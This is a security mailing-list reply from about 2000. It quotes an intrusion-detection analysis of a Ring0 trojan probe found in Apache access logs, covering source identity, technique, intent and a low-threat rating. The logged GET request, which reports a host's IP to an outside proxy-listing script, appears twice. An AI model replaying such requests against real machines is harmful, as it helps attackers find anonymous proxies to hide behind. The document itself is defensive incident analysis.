Ring0 (that was a nifty one):
http://www.sans.org/y2k/practical/Haruna_Isa.txt
Detect #4: Ring0
Apache Access Log View
194.209.172.145 - - [03/Feb/2000:15:06:27 -0500] "GET
http://www.rusftpsearch.net/cgi-bin/pst.pl?pstmode=writeip
&psthost=a.cable.host&pstport=80 HTTP/1.0" 404 292
1. Identity
194.209.172.145/border1.leunet.ch
Whois: Leunet, Frauenfeld, Switzerland
WWW (www.leunet.ch): Leunet Internet Provider
2. Technique
Attempting to send back to web server www.rusftpsearch.net that the
targeted host is running an anonymous web proxy. The machine
conducting the probe has likely been compromised by the Ring0 trojan.
3. Intent
Compiling a list of anonymous web proxies. If the targeted machine had
been running an anonymous web proxy, it would have accessed the cgi-
script at www.resftpsearch.com and passed its IP address as an
argument. Presumably, the cgi script would add the IP address to a
list of anonymous web proxies it was compiling. Trojan'd computers do
the scanning, therefore the owner of the originating computer in this
case might be unaware of the activity.
4. Active Targeting
Sort of. The Trojan randomly selects addresses to probe for web
proxies. Also, the owner of the source machine is likely unaware of
the activities of the Trojan.
5. Evaluation
Anonymous web proxies allow any user to proxy a web connection through
them thus hidng the source address of that user. A web site accessed
through the proxy would record the address of the proxy as the source.
This mechanism is a favorite with hackers to hide their identity when
mounting attacks or doing recon. These probes are conducted by the
Ring0 trojan. The source name 'border1' seems to be indicative of some
type of network border device (firewall, NAT device, etc.) Since this
is an ISP, the actual compromised machine might be behind the 'border'
device thus the address we have is not necessarily the address of the
compromised machine.
Bottom Line: Low threat. The targeted machine is not running an
anonymous web proxy. The web server which logged the access denied the
request.
Kurt Seifried, seifried@securityportal.com
Securityportal - your focal point for security on the 'net
----- Original Message -----
From: "Ulrich Klenk"
Hello all,
found this one in an Apache access-log-file:
"GET http://www.rusftpsearch.net/cgi-bin/pst.pl?pstmode=writeip&psthost=195.37.62 .127&pstport=80".
Can someone please point me to some information for that probe? What were they doing?
I found something about this in the list for December 1999, but there are only discussions about rusftpsearch.net..
Greetings, Uli
--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com